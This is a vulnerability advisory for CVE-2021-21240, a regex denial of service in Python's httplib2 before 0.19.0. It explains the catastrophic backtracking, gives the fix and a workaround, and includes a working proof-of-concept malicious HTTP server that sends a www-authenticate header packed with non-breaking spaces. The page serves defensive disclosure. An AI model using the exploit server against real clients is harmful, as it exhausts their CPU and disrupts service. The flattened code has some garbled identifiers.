CVE-2021-21240: Regular Expression Denial of Service in httplib2

Published Feb 8, 2021
·
Updated

Impact A malicious server which responds with long series of \xa0 characters in the www-authenticate header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server.

Patches Version 0.19.0 contains new implementation of auth headers parsing, using pyparsing library. https://github.com/httplib2/httplib2/pull/182

Workarounds py import httplib2 httplib2.USEWWWAUTHSTRICTPARSING = True

Technical Details

The vulnerable regular expression is https://github.com/httplib2/httplib2/blob/595e248d0958c00e83cb28f136a2a54772772b50/python3/httplib2/init.py#L336-L338

The section before the equals sign contains multiple overlapping groups. Ignoring the optional part containing a comma, we have:

\s[^ \t\r\n=]+\s=

Since all three infinitely repeating groups accept the non-breaking space character \xa0, a long string of \xa0 causes catastrophic backtracking.

The complexity is cubic, so doubling the length of the malicious string of \xa0 makes processing take 8 times as long.

Reproduction Steps

Run a malicious server which responds with

www-authenticate: x \xa0\xa0\xa0\xa0x

but with many more \xa0 characters.

An example malicious python server is below:

py from http.server import BaseHTTPRequestHandler, HTTPServer

def makeheadervalue(nspaces): repeat = "\xa0" nspaces return f"x {repeat}x"

class Handler(BaseHTTPRequestHandler): def doGET(self): self.logrequest(401) self.sendresponseonly(401) # Don't bother sending Server and Date nspaces = ( int(self.path[1:]) # Can GET e.g. /100 to test shorter sequences if len(self.path) > 1 else 65512 # Max header line length 65536 ) value = makeheadervalue(nspaces) self.sendheader("www-authenticate", value) # This header can actually be sent multiple times self.endheaders()

if name == "main": HTTPServer(("", 1337), Handler).serveforever()

Connect to the server with httplib2:

py import httplib2 httplib2.Http(".cache").request("http://localhost:1337", "GET")

To benchmark performance with shorter strings, you can set the path to a number e.g. http://localhost:1337/1000

References Thanks to Ben Caller (Doyensec) for finding vulnerability and discrete notification.

For more information If you have any questions or comments about this advisory: Open an issue in httplib2 Email current maintainer at 2021-01

Other sources

httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of "\xa0" characters in the "www-authenticate" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.

Affected Software

2 affected componentsFixes available
pip/httplib2<0.19.0
0.19.0
Httplib2 Project Httplib2 Python<0.19.0

Event History

Feb 8, 2021
Advisory Published
via GitHub·07:41 PM
CVE Published
via MITRE·07:45 PM
Data Sourced
via MITRE·07:45 PM
DescriptionSeverityWeakness

Frequently Asked Questions

1

What is the severity of CVE-2021-21240?

CVE-2021-21240 is classified as a Denial of Service vulnerability that can lead to CPU exhaustion.

2

How do I fix CVE-2021-21240?

To fix CVE-2021-21240, upgrade to httplib2 version 0.19.0 or later.

3

Which software is affected by CVE-2021-21240?

CVE-2021-21240 affects the httplib2 library versions prior to 0.19.0.

4

What is the impact of CVE-2021-21240?

CVE-2021-21240 can cause a Denial of Service condition due to excessive CPU usage when parsing specific malicious headers.

5

Is there an exploit for CVE-2021-21240?

Yes, CVE-2021-21240 can be exploited by a malicious server sending long series of '\xa0' characters in the 'www-authenticate' header.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203